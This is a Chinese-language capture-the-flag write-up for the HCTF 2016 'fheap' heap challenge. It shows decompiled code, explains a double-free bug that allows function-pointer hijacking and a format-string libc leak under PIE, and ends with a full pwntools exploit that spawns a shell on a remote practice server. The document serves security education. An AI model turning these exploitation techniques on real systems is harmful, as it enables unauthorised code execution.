2016HCTF fheap
| 00000000 Data struc ; (sizeof=0x20, mappedto_8) 00000000 ptr_content dq ? 00000008 content2_if_use dq ? 00000010 content_len dq ? 00000018 ptr_free_func dq ? 00000020 Data ends 00000020 00000000 ; 00000000 00000000 string struc ; (sizeof=0x10, mappedto_10) 00000000 INUSE dd ? 00000004 field_4 dd ? 00000008 Data dq ? 00000010 string ends 00000010
| unsigned __int64 create() { int i; struct Data *ptr; char *dest; size_t nbytes; size_t nbytesa; char buf[4104]; unsigned __int64 v7;
v7 = __readfsqword(0x28u); ptr = (struct Data *)malloc(0x20uLL); printf("Pls give string size:"); nbytes = read_10b(); if ( nbytes <= 0x1000 ) { printf("str:"); if ( read(0, buf, nbytes) == -1 ) { puts("got elf!!"); exit(1); } nbytesa = strlen(buf); if ( nbytesa > 0xF ) { dest = (char *)malloc(nbytesa); if ( !dest ) { puts("malloc faild!"); exit(1); } strncpy(dest, buf, nbytesa); ptr->ptr_content = (__int64)dest; ptr->ptr_free_func = (__int64)free_double_ptr; } else { strncpy((char *)ptr, buf, nbytesa); ptr->ptr_free_func = (__int64)free_single_ptr; } LODWORD(ptr->content_len) = nbytesa; for ( i = 0; i <= 15; ++i ) { if ( !list[i].INUSE ) { list[i].INUSE = 1; list[i].Data = (__int64)ptr; printf("The string id is %d\n", (unsigned int)i); break; } } if ( i == 16 ) { puts("The string list is full"); ((void (__fastcall *)(struct Data *))ptr->ptr_free_func)(ptr); } } else { puts("Invalid size"); free(ptr); } return __readfsqword(0x28u) ^ v7; }
| unsigned __int64 delete() { unsigned int index; char buf[264]; unsigned __int64 v3;
v3 = __readfsqword(0x28u); printf("Pls give me the string id you want to delete\nid:"); index = read_10b(); if ( index >= 0x11 ) puts("Invalid id"); if ( *((_QWORD *)&list + 2 * (int)index + 1) ) { printf("Are you sure?:"); read(0, buf, 0x100uLL); if ( !strncmp(buf, "yes", 3uLL) ) { (*(void (__fastcall **)(_QWORD))(*((_QWORD *)&list + 2 * (int)index + 1) + 24LL))(*((_QWORD*)&list+ 2 * (int)index+ 1)); *((_DWORD *)&list + 4 * (int)index) = 0; } } return __readfsqword(0x28u) ^ v3; }
delete函数检查了ptr位置却没有检查INUSE标志,所以可以double free。调用了函数指针指向的函数,参数是ptr结构体本身。这里很容易就想到劫持函数指针来改变程序的执行流。
程序开了PIE,尽管有足够的长度写入地址,如果不知道程序基址,我们也只能写入一字节来改变函数指针。原本free函数的地址在0xD52,显然就没法用plt段中的地址了,因为我们要找到函数地址应该也满足0xDXX的形式。取而代之的,我们去找call puts
想到这里,忽然想到一个问题,能不能如法炮制地,在某个0xDXX地址出找到一个call printf的跳转指令,这样不就不需要泄露基址也能获得libc地址了吗?好巧不巧,还真有,在0xD88处就有一个。这个指令位于delete函数中,这并不影响我们泄露地址,我们在printf完地址后,只要输入一个错误的index就可以让delete函数什么也不干直接返回menu。

这里的低三位是0x840,但实际上在远程获得的偏移是0x830。在libc database中查到多种结果,最后试得libc6_2.23-0ubuntu11_amd64才是正确版本。其实栈的前面还有很多其他的libc地址,但是本地和远程布局不太一样获取不到,所以找一个离程序起始比较近的地方去获取libc可能比较稳定。
| from pwn import * context.log_level = 'debug' r = remote('node5.buuoj.cn', 29570)
libc = ELF('./libc-2.23.so') e = ELF('./pwn-f')
def create(size, content): r.recvuntil(b'3.quit') r.sendline(b'create ') r.recvuntil(b'size:') r.sendline(str(size).encode()) r.recvuntil(b'str:') r.send(content) r.recvuntil(b'id is ')
def delete(index): r.recvuntil(b'3.quit') r.sendline(b'delete ') r.recvuntil(b'id:') r.sendline(str(index).encode()) r.recvuntil(b'sure?') r.sendline(b'yes')
def dbg(breakpoint): gdb.attach(r, breakpoint) pause()
create(4, b"a") create(4, b"b")
delete(1) delete(0)
create(0x20, b'aaaa%176$pyyyy'.ljust(0x18, b'c') + p8(0xB6)) dbg('b *printf') delete(1)
r.recvuntil(b"aaaa") libc_start_main_ret_addr = int(r.recvuntil(b"yyyy", drop=True), 16) libc_base = libc_start_main_ret_addr-0x20830 system_addr = libc_base + 0x45390
log.success("libc_base: " + hex(libc_base)) log.success("sys_addr: " + hex(system_addr))
r.sendline(b'') r.sendline(b'')
delete(0) create(0x20, b"/bin/sh".ljust(24, b"p") + p64(system_addr))